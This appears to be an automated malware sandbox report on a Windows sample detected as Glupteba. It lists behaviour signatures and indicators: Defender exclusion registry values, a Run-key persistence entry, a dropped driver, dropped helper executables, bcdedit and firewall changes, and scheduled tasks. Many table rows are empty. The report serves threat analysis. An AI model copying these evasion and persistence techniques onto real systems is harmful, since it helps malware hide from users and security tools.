Analysis Overview
SHA256
046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27
Threat Level: Known bad
The file 046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27 was found to be: Known bad.
Malicious Activity Summary
Windows security bypass
Glupteba payload
Glupteba
Modifies boot configuration data using bcdedit
Possible attempt to disable PatchGuard
Modifies Windows Firewall
Drops file in Drivers directory
Executes dropped EXE
UPX packed file
Windows security modification
Loads dropped DLL
Checks installed software on the system
Manipulates WinMonFS driver.
Adds Run key to start application
Manipulates WinMon driver.
Drops file in System32 directory
Drops file in Windows directory
Checks for VirtualBox DLLs, possible anti-VM trick
Launches sc.exe
Command and Scripting Interpreter: PowerShell
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
GoLang User-Agent
Uses Task Scheduler COM API
Modifies system certificate store
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-09 22:32
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-09 22:32
Reported
2024-05-09 22:37
Platform
win7-20240221-en
Max time kernel
293s
Max time network
298s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20240509223218.cab | C:\Windows\system32\makecab.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-21 = "Cape Verde Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" | C:\Windows\windefender.exe | N/A |
